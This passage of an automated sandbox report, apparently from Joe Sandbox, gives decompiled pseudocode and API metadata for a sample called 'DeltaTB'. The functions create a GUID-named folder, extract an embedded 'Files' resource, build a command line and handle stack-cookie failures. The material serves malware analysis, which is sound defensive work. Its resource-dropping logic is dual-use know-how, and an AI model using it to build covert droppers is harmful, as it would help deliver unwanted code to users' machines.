                                                                                                                                                              						_v556 = 0x1df14869;
                                                                                                                                                              						_v548 = 0x87;
                                                                                                                                                              						_v547 = 0x2f;
                                                                                                                                                              						_v546 = 0x49;
                                                                                                                                                              						_v545 = 0x3a;
                                                                                                                                                              						_v544 = 0xe;
                                                                                                                                                              						_v543 = _v560;
                                                                                                                                                              						_v542 = 0xdb;
                                                                                                                                                              						_v541 = 0x17;
                                                                                                                                                              					}
                                                                                                                                                              					_v552 = 0xbab0;
                                                                                                                                                              					_v550 = 0x7891;
                                                                                                                                                              					_push( &_v540);
                                                                                                                                                              					_push(0x104);
                                                                                                                                                              					if( *((intOrPtr*)(_t73 + 0x14))() != 0) {
                                                                                                                                                              						_t69 = 0;
                                                                                                                                                              						E009A221A( &_v540);
                                                                                                                                                              						_t74 = _t73 + 0x44;
                                                                                                                                                              						wsprintfW(_t74, L"%s%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X\\",  &_v540, _v556, _v552 & 0x0000ffff, _v550 & 0x0000ffff, _v548 & 0x000000ff, _v547 & 0x000000ff, _v546 & 0x000000ff, _v545 & 0x000000ff, _v544 & 0x000000ff, _v543 & 0x000000ff, _v542 & 0x000000ff, _v541 & 0x000000ff);
                                                                                                                                                              						_t77 = _t77 + 0x38;
                                                                                                                                                              						if(CreateDirectoryW(_t74, 0) == 0) {
                                                                                                                                                              							_t69 =  *((intOrPtr*)(_t73 + 0x40))();
                                                                                                                                                              							if(_t67 == 0xb7) {
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					break;
                                                                                                                                                              				}
                                                                                                                                                              				return E009A3BC5(0 | _t69 == 0x00000000, _t69, _v8 ^ _t76, _t72, _t73, _t74);
                                                                                                                                                              			}
























                                                                                                                                                              0x009a1421
                                                                                                                                                              0x009a142b
                                                                                                                                                              0x009a1437
                                                                                                                                                              0x009a1439
                                                                                                                                                              0x009a149b
                                                                                                                                                              0x009a14a4
                                                                                                                                                              0x009a14aa
                                                                                                                                                              0x009a14b4
                                                                                                                                                              0x009a14b9
                                                                                                                                                              0x009a14c1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a14c1
                                                                                                                                                              0x009a14b4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a142b
                                                                                                                                                              0x009a14db

                                                                                                                                                              APIs
                                                                                                                                                              • wsprintfW.USER32 ref: 009A14A4
                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 009A14AF
                                                                                                                                                              Strings
                                                                                                                                                              • %s%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X\, xrefs: 009A149E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectorywsprintf
                                                                                                                                                              • String ID: %s%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X\
                                                                                                                                                              • API String ID: 2146621440-1982538544
                                                                                                                                                              • Opcode ID: 9b17950a86dd40dc4c28304f1534c136d534393324aab05b902bbf3b959754bc
                                                                                                                                                              • Instruction ID: 99185ad2f961732fa69ea67ce67f857b4e7acedb8fb545c30f8ed027d3dda5d3
                                                                                                                                                              • Opcode Fuzzy Hash: 9b17950a86dd40dc4c28304f1534c136d534393324aab05b902bbf3b959754bc
                                                                                                                                                              • Instruction Fuzzy Hash: 1C3186719452ACAEDB218BB59C4CBEDBBB85F2E301F0400D5E598A6181C7389F84CFA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 202 9a1000-9a1013 call 9a1372 205 9a101c-9a1032 FindResourceW 202->205 206 9a1015-9a101a 202->206 207 9a104a 205->207 208 9a1034-9a1048 call 9a1b44 205->208 209 9a1097-9a109c 206->209 211 9a104f-9a1051 207->211 208->211 213 9a105a-9a1073 call 9a17f0 211->213 214 9a1053-9a1058 211->214 217 9a1081-9a1089 call 9a1985 213->217 218 9a1075-9a107f call 9a17bc 213->218 214->209 222 9a108e-9a1092 217->222 218->209 222->209
                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E009A1000(intOrPtr __eax, void* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v12;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void* _t8;
                                                                                                                                                              				void* _t10;
                                                                                                                                                              				void* _t12;
                                                                                                                                                              				signed int _t13;
                                                                                                                                                              				signed int _t15;
                                                                                                                                                              				intOrPtr _t24;
                                                                                                                                                              
                                                                                                                                                              				_t22 = __edx;
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_t24 = __eax; // executed
                                                                                                                                                              				_t8 = E009A1372(__edx, __eax); // executed
                                                                                                                                                              				if(_t8 != 0) {
                                                                                                                                                              					_t28 =  *(_t24 + 0x250);
                                                                                                                                                              					if(FindResourceW( *(_t24 + 0x250), L"Files", 0xa) == 0) {
                                                                                                                                                              						_t10 = 0x716;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t10 = E009A1B44(_t28,  &_v8,  &_v12, _t9);
                                                                                                                                                              					}
                                                                                                                                                              					if(_t10 == 0) {
                                                                                                                                                              						_t29 = _t24 + 0x254;
                                                                                                                                                              						 *(_t24 + 0x254) =  *(_t24 + 0x254) & 0x00000000;
                                                                                                                                                              						_t12 = E009A17F0(_v8,  &_v12, _t29); // executed
                                                                                                                                                              						if(_t12 == 0) {
                                                                                                                                                              							_t13 = E009A1985(_t29, _t22, _t24 + 0x44, 1); // executed
                                                                                                                                                              							asm("sbb eax, eax");
                                                                                                                                                              							_t15 =  ~_t13 & 0xffffe131;
                                                                                                                                                              						} else {
                                                                                                                                                              							E009A17BC(_t29);
                                                                                                                                                              							_t15 = 0xffffe130;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_t15 = 0xffffe12f;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t15 = 0xffffe12e;
                                                                                                                                                              				}
                                                                                                                                                              				return _t15;
                                                                                                                                                              			}














                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 009A1372: wsprintfW.USER32 ref: 009A14A4
                                                                                                                                                                • Part of subcall function 009A1372: CreateDirectoryW.KERNELBASE(?,00000000), ref: 009A14AF
                                                                                                                                                              • FindResourceW.KERNEL32(?,Files,0000000A,?,?,?,?,?,009A1603), ref: 009A102A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectoryFindResourcewsprintf
                                                                                                                                                              • String ID: Files
                                                                                                                                                              • API String ID: 975690600-3354685277
                                                                                                                                                              • Opcode ID: 6694fe8ec4199b8573751995cb46a90ab09312f45fa5c9c213d3eed61b72caa3
                                                                                                                                                              • Instruction ID: 0b3bd5f956923c397b6638856d2ccadd5dabad92555480cd0778eb1b9609868f
                                                                                                                                                              • Opcode Fuzzy Hash: 6694fe8ec4199b8573751995cb46a90ab09312f45fa5c9c213d3eed61b72caa3
                                                                                                                                                              • Instruction Fuzzy Hash: 1E01F9326146616BD7105639CC01BBBB38C9FD3351F044615B556D31C0EB78EC8486E6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 223 9a12e1-9a131f call 9a3c21 226 9a135d-9a136f call 9a3bc5 223->226 227 9a1321-9a1327 223->227 229 9a1334-9a1338 227->229 230 9a133a-9a1342 229->230 231 9a1329-9a132d 229->231 233 9a134a-9a1350 call 9a121f 230->233 234 9a1344-9a1349 230->234 231->230 235 9a132f-9a1330 231->235 237 9a1355-9a135b 233->237 234->233 235->229 237->226 237->227
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E009A12E1(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				char _v540;
                                                                                                                                                              				intOrPtr _v544;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				short* _t27;
                                                                                                                                                              				short* _t28;
                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                              				short* _t35;
                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                              				signed int _t38;
                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                              				signed int _t40;
                                                                                                                                                              				signed int _t42;
                                                                                                                                                              				signed int _t43;
                                                                                                                                                              				signed int _t48;
                                                                                                                                                              
                                                                                                                                                              				_t36 = __edi;
                                                                                                                                                              				_t29 = __ebx;
                                                                                                                                                              				_t42 = (_t40 & 0xfffffff8) - 0x21c;
                                                                                                                                                              				_v8 =  *0x9a5000 ^ _t42;
                                                                                                                                                              				_v544 = __ecx;
                                                                                                                                                              				E009A3C21( &_v540, _a4, 0x104);
                                                                                                                                                              				_t25 = 0;
                                                                                                                                                              				_t43 = _t42 + 0xc;
                                                                                                                                                              				_t38 = 0;
                                                                                                                                                              				if(_v540 != 0) {
                                                                                                                                                              					do {
                                                                                                                                                              						_t27 = _t43 + 8 + _t38 * 2;
                                                                                                                                                              						_t35 = _t27;
                                                                                                                                                              						while( *_t27 != 0) {
                                                                                                                                                              							__eflags =  *_t27 - 0x3b;
                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                              								_t38 = _t38 + 1;
                                                                                                                                                              								__eflags = _t38;
                                                                                                                                                              								_t27 = _t43 + 8 + _t38 * 2;
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              							goto L5;
                                                                                                                                                              						}
                                                                                                                                                              						L5:
                                                                                                                                                              						_t28 = _t43 + 8 + _t38 * 2;
                                                                                                                                                              						if( *_t28 == 0x3b) {
                                                                                                                                                              							 *_t28 = 0;
                                                                                                                                                              							_t38 = _t38 + 1;
                                                                                                                                                              							_t48 = _t38;
                                                                                                                                                              						}
                                                                                                                                                              						_t25 = E009A121F(_t29, _t35, _t48, _v544); // executed
                                                                                                                                                              					} while ( *((short*)(_t43 + 8 + _t38 * 2)) != 0);
                                                                                                                                                              				}
                                                                                                                                                              				_pop(_t39);
                                                                                                                                                              				return E009A3BC5(_t25, _t29, _v8 ^ _t43, _t35, _t36, _t39);
                                                                                                                                                              			}



















                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsncpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1735881322-0
                                                                                                                                                              • Opcode ID: bf9389737f1818ef4ccc242f74773e80caaf7248216940c4da2c6a281e6a61e2
                                                                                                                                                              • Instruction ID: 5f32fcf5e5a22548c134a5e574f0af033a1a164da44927a2e8e272db41662555
                                                                                                                                                              • Opcode Fuzzy Hash: bf9389737f1818ef4ccc242f74773e80caaf7248216940c4da2c6a281e6a61e2
                                                                                                                                                              • Instruction Fuzzy Hash: DE019E309043049BCB20FF64D845AABB3E8EB96350F448D2AE98A87590EB70D984C7D2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 238 9a17bc-9a17c1 239 9a17c3-9a17cb VirtualFree 238->239 240 9a17d1-9a17dc 238->240 239->240
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E009A17BC(signed int* __esi) {
                                                                                                                                                              				void* _t6;
                                                                                                                                                              				signed int* _t7;
                                                                                                                                                              
                                                                                                                                                              				_t7 = __esi;
                                                                                                                                                              				_t6 = __esi[2];
                                                                                                                                                              				if(_t6 != 0) {
                                                                                                                                                              					_t6 = VirtualFree(_t6, 0, 0x8000); // executed
                                                                                                                                                              				}
                                                                                                                                                              				_t7[2] = _t7[2] & 0x00000000;
                                                                                                                                                              				_t7[1] = _t7[1] & 0x00000000;
                                                                                                                                                              				 *_t7 =  *_t7 & 0x00000000;
                                                                                                                                                              				return _t6;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000,009A107A,?,?,?,?,?,?,009A1603), ref: 009A17CB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                              • Opcode ID: 2c120756f889692611642ea6b155607eff33d879ac8f50b9e4c32ef83c48d6a3
                                                                                                                                                              • Instruction ID: 841483a016d4f9301ad30fe8fde681166b5a6a262fef00e0383343b8d21c7cc4
                                                                                                                                                              • Opcode Fuzzy Hash: 2c120756f889692611642ea6b155607eff33d879ac8f50b9e4c32ef83c48d6a3
                                                                                                                                                              • Instruction Fuzzy Hash: 2CD0EA71660B029FEB208F12DC89B26B3E8BB51B27F65880CA1A6958D1D7B8E4449A54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 241 9a2236-9a223b 242 9a223d-9a223f 241->242 243 9a2240-9a2253 VirtualAlloc 241->243
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E009A2236(long _a4) {
                                                                                                                                                              				void* _t3;
                                                                                                                                                              
                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                              					_t3 = VirtualAlloc(0, _a4, 0x1000, 4); // executed
                                                                                                                                                              					return _t3;
                                                                                                                                                              				} else {
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              			}





                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,009A1863,00000000,?,?), ref: 009A224D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                              • Opcode ID: ee38e28ebc7a005db216de03edbf97a947a01c91fb42015531c5a021d218e411
                                                                                                                                                              • Instruction ID: e13c11b749727965004262ba7fe4d102f476e2a6cea3ab3933cba74fc82cf67d
                                                                                                                                                              • Opcode Fuzzy Hash: ee38e28ebc7a005db216de03edbf97a947a01c91fb42015531c5a021d218e411
                                                                                                                                                              • Instruction Fuzzy Hash: 7EC09B70799300BFEF554B548E06B8577919BC5B57F10C454F358544D4C7F45444F646
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 244 9a23ab-9a23bc VirtualFree
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E009A23AB(void* _a8) {
                                                                                                                                                              				int _t2;
                                                                                                                                                              
                                                                                                                                                              				_t2 = VirtualFree(_a8, 0, 0x8000); // executed
                                                                                                                                                              				return _t2;
                                                                                                                                                              			}





                                                                                                                                                              APIs
                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 009A23B6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                              • Opcode ID: 69a7564585ec807b9ac53d081bc9ae49e458d0e9f36a2bfca4fc906c4d16bbc2
                                                                                                                                                              • Instruction ID: be8edee0c03849f073cc7b1555a109656488ac1775f6cd2cad4c8849ade9a391
                                                                                                                                                              • Opcode Fuzzy Hash: 69a7564585ec807b9ac53d081bc9ae49e458d0e9f36a2bfca4fc906c4d16bbc2
                                                                                                                                                              • Instruction Fuzzy Hash: E3A001306A8751ABEE619F10AD0AB097B61BB81B01F208854B2A1690E08BA16418AA4A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E009A3BC5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                              				intOrPtr _v0;
                                                                                                                                                              				void* _v804;
                                                                                                                                                              				intOrPtr _v808;
                                                                                                                                                              				intOrPtr _v812;
                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                              				long _t17;
                                                                                                                                                              				intOrPtr _t21;
                                                                                                                                                              				intOrPtr _t22;
                                                                                                                                                              				intOrPtr _t25;
                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                              				intOrPtr _t27;
                                                                                                                                                              				intOrPtr* _t31;
                                                                                                                                                              
                                                                                                                                                              				_t27 = __esi;
                                                                                                                                                              				_t26 = __edi;
                                                                                                                                                              				_t25 = __edx;
                                                                                                                                                              				_t22 = __ecx;
                                                                                                                                                              				_t21 = __ebx;
                                                                                                                                                              				_t6 = __eax;
                                                                                                                                                              				if(__ecx ==  *0x9a5000) {
                                                                                                                                                              					asm("repe ret");
                                                                                                                                                              				}
                                                                                                                                                              				 *0x9a5118 = _t6;
                                                                                                                                                              				 *0x9a5114 = _t22;
                                                                                                                                                              				 *0x9a5110 = _t25;
                                                                                                                                                              				 *0x9a510c = _t21;
                                                                                                                                                              				 *0x9a5108 = _t27;
                                                                                                                                                              				 *0x9a5104 = _t26;
                                                                                                                                                              				 *0x9a5130 = ss;
                                                                                                                                                              				 *0x9a5124 = cs;
                                                                                                                                                              				 *0x9a5100 = ds;
                                                                                                                                                              				 *0x9a50fc = es;
                                                                                                                                                              				 *0x9a50f8 = fs;
                                                                                                                                                              				 *0x9a50f4 = gs;
                                                                                                                                                              				asm("pushfd");
                                                                                                                                                              				_pop( *0x9a5128);
                                                                                                                                                              				 *0x9a511c =  *_t31;
                                                                                                                                                              				 *0x9a5120 = _v0;
                                                                                                                                                              				 *0x9a512c =  &_a4;
                                                                                                                                                              				 *0x9a5068 = 0x10001;
                                                                                                                                                              				 *0x9a501c =  *0x9a5120;
                                                                                                                                                              				 *0x9a5010 = 0xc0000409;
                                                                                                                                                              				 *0x9a5014 = 1;
                                                                                                                                                              				_v812 =  *0x9a5000;
                                                                                                                                                              				_v808 =  *0x9a5004;
                                                                                                                                                              				 *0x9a5060 = IsDebuggerPresent();
                                                                                                                                                              				_push(1);
                                                                                                                                                              				E009A3DC2(_t14);
                                                                                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                                                                                              				_t17 = UnhandledExceptionFilter(0x9a409c);
                                                                                                                                                              				if( *0x9a5060 == 0) {
                                                                                                                                                              					_push(1);
                                                                                                                                                              					E009A3DC2(_t17);
                                                                                                                                                              				}
                                                                                                                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                              			}
















                                                                                                                                                              APIs
                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 009A3D77
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009A3D8C
                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(009A409C), ref: 009A3D97
                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 009A3DB3
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 009A3DBA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                              • Opcode ID: 0eaeac21a4e7949fb31cc773fd5ad289d3b9c1bfadd8572015b023e65025f6c4
                                                                                                                                                              • Instruction ID: 501ad9fbd372bc51bb39696068a411a626bfad711a8b93d3bb39daf8c677dada
                                                                                                                                                              • Opcode Fuzzy Hash: 0eaeac21a4e7949fb31cc773fd5ad289d3b9c1bfadd8572015b023e65025f6c4
                                                                                                                                                              • Instruction Fuzzy Hash: 4921F074A3CA24EFC740DF24E8457687BA4FF4B304F828059E50987261E3B09A85EFD5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E009A1B44(struct HINSTANCE__* _a4, intOrPtr* _a8, intOrPtr* _a12, struct HRSRC__* _a16) {
                                                                                                                                                              				void* _t14;
                                                                                                                                                              
                                                                                                                                                              				_t14 = LoadResource(_a4, _a16);
                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                              					return 0x716;
                                                                                                                                                              				}
                                                                                                                                                              				 *_a12 = SizeofResource(_a4, _a16);
                                                                                                                                                              				 *_a8 = LockResource(_t14);
                                                                                                                                                              				return 0;
                                                                                                                                                              			}





                                                                                                                                                              APIs
                                                                                                                                                              • LoadResource.KERNEL32(?,?,?,?,009A1045,?,?,?,00000000,?,?,?,?,?,009A1603), ref: 009A1B4E
                                                                                                                                                              • SizeofResource.KERNEL32(?,?,?,009A1045,?,?,?,00000000,?,?,?,?,?,009A1603), ref: 009A1B60
                                                                                                                                                              • LockResource.KERNEL32(00000000,?,009A1045,?,?,?,00000000,?,?,?,?,?,009A1603), ref: 009A1B6C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Resource$LoadLockSizeof
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2853612939-0
                                                                                                                                                              • Opcode ID: a60149f7bcdefe025208442160ee6d64d5c31cb68d3c61402da33bd85fc05cd9
                                                                                                                                                              • Instruction ID: a2f9e0b95926f51ff3c82b936627f1cb4b1581c91d95d40c9d1abc528f2a43f6
                                                                                                                                                              • Opcode Fuzzy Hash: a60149f7bcdefe025208442160ee6d64d5c31cb68d3c61402da33bd85fc05cd9
                                                                                                                                                              • Instruction Fuzzy Hash: A1E01236516129EFCB119F64DD5489A7F75EF4A390B014465FE099B320D771D810EFE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E009A154E(void* __edi) {
                                                                                                                                                              				intOrPtr _v4;
                                                                                                                                                              				signed int _t11;
                                                                                                                                                              				void* _t12;
                                                                                                                                                              				signed short* _t13;
                                                                                                                                                              
                                                                                                                                                              				_t12 = __edi;
                                                                                                                                                              				_t13 =  *((intOrPtr*)(__edi + 0x38))();
                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_t11 =  *_t13 & 0x0000ffff;
                                                                                                                                                              						if(_t11 == 0x20 || _t11 == 0x2f || _t11 == 0x2d) {
                                                                                                                                                              							goto L5;
                                                                                                                                                              						}
                                                                                                                                                              						_t13 =  &(_t13[1]);
                                                                                                                                                              						if(_t13 != 0) {
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              						goto L5;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				L5:
                                                                                                                                                              				E009A3C02(_v4, E009A14DC(_t12, L"CommandLine"));
                                                                                                                                                              				E009A3BD4(_v4, " ");
                                                                                                                                                              				E009A3BD4(_v4, _t13);
                                                                                                                                                              				return 0;
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcscat$_wcscpy
                                                                                                                                                              • String ID: CommandLine
                                                                                                                                                              • API String ID: 1832442500-3253501508
                                                                                                                                                              • Opcode ID: b129a49fb17cda45a3e2543e7a7beb14cd044c8e1aafb511fd7e688c02b2ea7c
